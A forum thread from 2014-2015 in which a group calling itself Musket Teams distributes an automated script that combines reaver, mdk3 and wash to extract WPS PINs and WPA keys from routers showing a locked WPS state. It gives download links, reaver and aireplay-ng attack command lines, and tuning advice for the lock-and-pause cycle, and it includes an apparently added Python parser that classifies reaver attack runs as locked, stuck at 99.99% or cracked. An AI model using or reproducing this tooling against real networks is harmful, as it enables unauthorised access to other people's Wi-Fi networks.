musketteams, posted November 15, 2014:

Musket Teams have completed the latest WPS Locked intrusion script using reaver, mdk3 and wash in an automated process. This approach works on some routers. The program can be used for normal reaver operations as well.

The VMR-MDK009.zip file contains:
1. VMR-MDK009i.sh script
2. VMR-MDK009j.sh script (untested; see comments in help file)
3. Introductory help files
4. VARMAC_CONFIG folder containing
   1. maclistreavermdkvar1
   2. configtemplate1
   3. configtemplate2
   4. configtemplate3
   5. configtemplate4
   6. configtemplate5

Download VMR-MDK009.zip at http://www.axifile.com/en/5C34EBC933
ZaraByte, posted November 15, 2014:

Explain more about this.
musketteams, posted November 16, 2014 (edited November 16, 2014):

Since you asked, here is a short history.

Soxrox212 started this with his note on alternative mdk3 approaches to reset routers in the kali-linux forums. MTeams tried all sorts of combinations but got nowhere.

Later, the author of autoreaver noted in his bash program for BT5R3 that the following reaver command line worked well against routers having weak relative strength (i.e. RSSI):

reaver -i mon0 -a -b 55:44:33:22:11:00 -r 3:15 -E -S -vv -N -T 1 -t 20 -d 0 -x 30

See https://forums.kali.org/showthread.php?22446-A-reaver-command-line-for-routers-at-long-range-or-routers-responding-erratically&highlight=reaver+99.99%25

Musket Teams began experimenting with this command line and discovered that routers showing an unlocked WPS state, which responded poorly to simple reaver command lines, could be induced to give up WPS pins with the above command.

MTeams also discovered that if the router ran up to 99.99% and spun at that number, and you reset the reaver command line in a certain way, the WPS pin and WPA key were provided in one iteration from reaver. Go here for the steps: https://forums.kali.org/showthread.php?22507-Cracking-6C-19-8F-D-Link-Router-with-reaver-and-defeating-the-99-99-problem&highlight=reaver+99.99%25

MTeams turned their attention to WPS Locked routers and discovered that some routers showing a WPS locked state gave up pins and then locked. Furthermore, if subjected to combinations of mdk3, the router would give up more pins. Hence you could collect pins, hit the router with a short burst of mdk3, then pause, and then collect pins again in an endless cycle. This required an automated script and is far more complex than noted here, as it is a balancing act between reaver, mdk3 attack type and router recovery time.

From this, the scripts above were written. With this download there are long help files in a text file and also embedded in the primary config file. You have the history.

Go to the help files for more details. In closing, this does not work with all routers. But a short test will tell you if the router is susceptible.

Musket Team
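The post above describes three states a practitioner has to tell apart while running reaver against such a router: the AP rate-limiting (locking) after answering a few pins, the run spinning at 99.99%, and the run finishing with a PIN and PSK. The following is an added example, not code from the VMR-MDK scripts or from Musket Teams, that parses reaver's verbose output and reports which state a run is in and how many pins the AP answered between locks. The line formats it matches (`[+] Trying pin ...`, `[+] NN.NN% complete @ ...`, `[!] WARNING: Detected AP rate limiting, ...`, `[+] WPS PIN: '...'`, `[+] WPA PSK: '...'`) are assumed from reaver 1.4 `-vv` output; the sample logs are constructed, not captured from a real router.

```python
"""Classify a reaver run from its verbose log output.

Added example, not part of VMR-MDK or reaver. Line formats are assumed
from reaver 1.4 -vv output; sample logs below are constructed.
"""
import re
from dataclasses import dataclass, field
from typing import Iterable, List, Optional

# Assumed reaver 1.4 -vv line formats (not taken from the original post).
RE_TRY = re.compile(r"^\[\+\] Trying pin (\d{8})")
RE_PROGRESS = re.compile(r"^\[\+\] (\d+\.\d+)% complete @ \S+ \S+ \((\d+) seconds/pin\)")
RE_RATE_LIMIT = re.compile(r"^\[!\] WARNING: Detected AP rate limiting, waiting (\d+) seconds")
RE_WPS_PIN = re.compile(r"^\[\+\] WPS PIN: '(\d{8})'")
RE_WPA_PSK = re.compile(r"^\[\+\] WPA PSK: '(.*)'$")


@dataclass
class ReaverState:
    pins_tried: List[str] = field(default_factory=list)
    progress: List[float] = field(default_factory=list)   # one entry per answered attempt
    seconds_per_pin: Optional[int] = None
    rate_limit_hits: int = 0
    rate_limit_wait: int = 0           # total seconds reaver said it would wait
    pins_per_cycle: List[int] = field(default_factory=list)  # answered pins between locks
    wps_pin: Optional[str] = None
    wpa_psk: Optional[str] = None


def parse_reaver_log(lines: Iterable[str]) -> ReaverState:
    """Walk reaver output once and accumulate the counters above."""
    st = ReaverState()
    answered_this_cycle = 0
    for raw in lines:
        line = raw.rstrip("\n")
        if m := RE_TRY.match(line):
            st.pins_tried.append(m.group(1))
        elif m := RE_PROGRESS.match(line):
            # A progress line is printed after the AP answered the attempt.
            st.progress.append(float(m.group(1)))
            st.seconds_per_pin = int(m.group(2))
            answered_this_cycle += 1
        elif m := RE_RATE_LIMIT.match(line):
            st.rate_limit_hits += 1
            st.rate_limit_wait += int(m.group(1))
            st.pins_per_cycle.append(answered_this_cycle)
            answered_this_cycle = 0
        elif m := RE_WPS_PIN.match(line):
            st.wps_pin = m.group(1)
        elif m := RE_WPA_PSK.match(line):
            st.wpa_psk = m.group(1)
    st.pins_per_cycle.append(answered_this_cycle)  # pins answered since the last lock
    return st


def stuck_at_9999(st: ReaverState, repeats: int = 3) -> bool:
    """True when the last `repeats` progress reports all read 99.99%,
    i.e. the run is spinning at the value the post calls the 99.99% problem."""
    tail = st.progress[-repeats:]
    return len(tail) == repeats and all(p == 99.99 for p in tail)


def classify(st: ReaverState) -> str:
    """Return one of: cracked, pin_only, stuck_99.99, locked, running."""
    if st.wps_pin and st.wpa_psk:
        return "cracked"
    if st.wps_pin:
        return "pin_only"
    if stuck_at_9999(st):
        return "stuck_99.99"
    if st.rate_limit_hits:
        return "locked"
    return "running"


# Constructed sample logs (not real captures).
SAMPLE_LOCKED = """[+] Waiting for beacon from 00:11:22:33:44:55
[+] Associated with 00:11:22:33:44:55 (ESSID: testnet)
[+] Trying pin 12345670
[+] Received WSC NACK
[+] 0.01% complete @ 2014-11-16 10:00:03 (3 seconds/pin)
[+] Trying pin 00005678
[+] 0.02% complete @ 2014-11-16 10:00:06 (3 seconds/pin)
[+] Trying pin 01235678
[+] 0.03% complete @ 2014-11-16 10:00:09 (3 seconds/pin)
[!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
[+] Trying pin 11115670
[+] 0.04% complete @ 2014-11-16 10:01:12 (3 seconds/pin)
[+] Trying pin 22225670
[+] 0.05% complete @ 2014-11-16 10:01:15 (3 seconds/pin)
[!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
""".splitlines()

SAMPLE_STUCK = """[+] Trying pin 12345670
[+] 99.99% complete @ 2014-11-16 11:00:00 (3 seconds/pin)
[+] Trying pin 12345670
[+] 99.99% complete @ 2014-11-16 11:00:03 (3 seconds/pin)
[+] Trying pin 12345670
[+] 99.99% complete @ 2014-11-16 11:00:06 (3 seconds/pin)
""".splitlines()

SAMPLE_CRACKED = """[+] Trying pin 12345670
[+] 99.99% complete @ 2014-11-16 12:00:00 (3 seconds/pin)
[+] WPS PIN: '12345670'
[+] WPA PSK: 'constructed-psk'
[+] AP SSID: 'testnet'
""".splitlines()


if __name__ == "__main__":
    for name, log in (("locked", SAMPLE_LOCKED), ("stuck", SAMPLE_STUCK), ("cracked", SAMPLE_CRACKED)):
        st = parse_reaver_log(log)
        print(name, classify(st), "pins/cycle", st.pins_per_cycle, "waited", st.rate_limit_wait, "s")
```

`pins_per_cycle` is the number the post's "collect pins, burst, pause, collect again" loop has to balance against router recovery time: if it drops to zero after a burst, the pause was too short or the router is not one of the susceptible models. Feed the parser from `reaver ... -vv | tee reaver.log` and run it over the saved log.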
ZaraByte, posted November 16, 2014:

Meh, tested this against a Comcast router; it failed to associate. I think it's due to the fact that Comcast routers are push-button :D and/or they need to add something like replay-ng to make it associate to the router that way.
musketteams, posted November 17, 2014 (edited November 17, 2014):

MTeams can add any additional Eterm modules you require. We are not sure what you mean by replay-ng. Do you mean aireplay-ng -1?

If you mean aireplay-ng -1, you can test this. Run the script on the channel of the target (do not use channel hopping), then open a terminal window and type in:

aireplay-ng -1 10 -a XX:XX:XX:XX:XX:XX mon0

Set the LIVE1 variable to at least 300 seconds or more to give you time to test.

The problem with aireplay-ng is that if it does not get association with the router quickly, it terminates. It also does not like channel hopping. We corresponded with aircrack-ng trying to find a way to keep aireplay-ng live, but the solutions they suggested did not work. You can find this correspondence in the aircrack-ng forums.

In our areas of operation we do not have any problem with association, so it is difficult for us to develop a program that we cannot actually test.
ZaraByte, posted November 17, 2014 (quoting musketteams' post above):

https://code.google.com/p/reaver-wps/issues/detail?id=205 comment #7: some people claim you're too far from the router.
musketteams, posted December 12, 2014:

The previous hosting site has stopped functioning.

You can download varmacreaversav99-3.zip at: http://www.datafilehost.com/d/88864143

You can download VMR-MDK009.zip at: http://www.datafilehost.com/d/ec0c478c

MTeams
musketteams, posted January 7, 2015 (edited January 8, 2015):

The following VMR-MDK009x2.sh has been written to take advantage of a flaw in some WPS locked routers allowing the collection of pins even though reaver and wash show the router is locked. The download includes extensive help files and has been tested against numerous routers showing this flaw. All were cracked.

Also included in the help files is how to handle the 99.99% problem, which occurs in almost half of the successful attacks against routers providing small numbers of pins when the WPS system is locked.

Reference the download VMR-MDK009x2.sh: we have found an error in one configuration file named configfiledetailed1x2. You can REM/comment out the following two (2) variables with a #:

USE_PIN1= should read #USE_PIN1=
WPS_PIN1= should read #WPS_PIN1=

or you can download the corrected version.

New download package VMRMDK150108: http://www.datafilehost.com/d/18156813

Musket Teams